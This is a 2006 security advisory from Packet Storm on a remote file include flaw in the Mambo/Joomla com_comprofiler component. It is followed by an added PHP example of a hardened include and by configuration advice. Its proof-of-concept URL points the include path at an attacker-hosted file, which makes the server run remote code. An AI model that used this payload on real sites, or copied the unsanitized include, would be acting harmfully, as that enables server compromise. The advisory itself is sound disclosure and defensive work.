comcomprofiler.txt

Reported by Matdhule, 28 Aug 2006. Type: packetstorm. Source: packetstormsecurity.com

Mambo/Joomla com_comprofiler v1.0 RC 2 Remote File Include Vulnerability in plugin.class.ph

---------------------------------------------------------------------------
Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities  
---------------------------------------------------------------------------  
  
Author : Matdhule  
Date : August, 25th 2006  
Location : Indonesia, Jakarta  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
com_comprofiler Components  
  
Application : com_comprofiler  
version : 1.0 RC 2  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~  
  
In the com_comprofiler folder we found a vulnerable script, plugin.class.php:
  
-----------------------plugin.class.php----------------------  
<?php  
/**  
* Plugin handler  
* @package Joomla  
* @author various, JoomlaJoe and Beat  
*/  
  
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );  
  
----------------------------------------------------------  
  
The variable $mosConfig_absolute_path is not properly sanitized before it is used as the base of the require_once path.
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~  
  
http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://attacker.com/evil.txt?  
  
Solution:  
~~~~~~~~  
  
Sanitize the variable $mosConfig_absolute_path in plugin.class.php.
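The following is an added example, not code from the advisory or from the com_comprofiler/Joomla project, showing the vulnerable include pattern above beside a hardened replacement. It assumes the file location the PoC URL implies (administrator/components/com_comprofiler/plugin.class.php under the site root), that the vulnerable condition is the script being requested directly with register_globals=On so the query string populates $mosConfig_absolute_path before require_once runs, and that the host application defines the constant _VALID_MOS before loading components (the Joomla 1.0/Mambo convention). The function names are hypothetical.

```php
<?php
// Added example (not part of the advisory or of the com_comprofiler code).
// Assumption: this file lives at administrator/components/com_comprofiler/
// plugin.class.php under the site root, as the advisory's PoC URL shows.

// --- Vulnerable form (pattern from the advisory) -----------------------------
// Under register_globals=On a direct request such as
//   plugin.class.php?mosConfig_absolute_path=http://example.invalid/x?
// fills the global from the query string, so require_once would fetch and
// run a remote file (when allow_url_fopen/allow_url_include permit it)
// instead of the local DOMIT library.
function vulnerable_include_path()
{
    global $mosConfig_absolute_path;
    return $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php';
}

// --- Hardened form -----------------------------------------------------------
// 1. Refuse direct requests. Joomla 1.0 / Mambo define _VALID_MOS in index.php
//    before loading components; a direct hit on this file never has it.
//    In the real file this is: defined('_VALID_MOS') or die('Direct Access ...');
function is_direct_access()
{
    return !defined('_VALID_MOS');
}

// 2. Derive the site root from the script's own location rather than from a
//    global that register_globals could have filled from the request.
function site_root_from_file($file)
{
    // administrator/components/com_comprofiler/plugin.class.php -> site root
    return dirname(dirname(dirname(dirname($file))));
}

// 3. Accept an include base only if it is a plain local directory: no URL
//    scheme or stream wrapper, and it must resolve on disk.
function is_safe_include_base($path)
{
    if (!is_string($path) || $path === '') {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false; // http://, ftp://, php://, data://, ...
    }
    $real = realpath($path);
    return $real !== false && is_dir($real);
}

function hardened_include_path($file)
{
    $base = site_root_from_file($file);
    if (!is_safe_include_base($base)) {
        throw new RuntimeException('Refusing to include from ' . $base);
    }
    return $base . '/includes/domit/xml_domit_lite_include.php';
}

if (PHP_SAPI === 'cli') {
    // Self-check with constructed values; nothing is actually included.
    $mosConfig_absolute_path = 'http://example.invalid/evil.txt?';   // constructed
    echo "vulnerable: " . vulnerable_include_path() . "\n";            // remote URL wins
    var_dump(is_direct_access());                                      // bool(true): no _VALID_MOS
    var_dump(is_safe_include_base($mosConfig_absolute_path));          // bool(false)
    var_dump(is_safe_include_base(sys_get_temp_dir()));                // bool(true)

    // A plausible on-disk layout rooted in the temp dir (constructed path).
    $fake = sys_get_temp_dir() . '/administrator/components/com_comprofiler/plugin.class.php';
    echo "hardened: " . hardened_include_path($fake) . "\n";           // <tmp>/includes/domit/...
}
```

The guard and the __FILE__-derived path remove the dependency on request-controlled globals entirely; is_safe_include_base() is defence in depth for any remaining place where a configured base path is still used. Independently of the code, allow_url_include=Off (PHP 5.2 and later) and register_globals=Off in php.ini stop this class of remote include at the interpreter level.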
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)  
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous  
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama  
~ [email protected], [email protected]  
~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~  
  
matdhule[at]gmail[dot]com  
  
-------------------------------- [ EOF ] ----------------------------------  
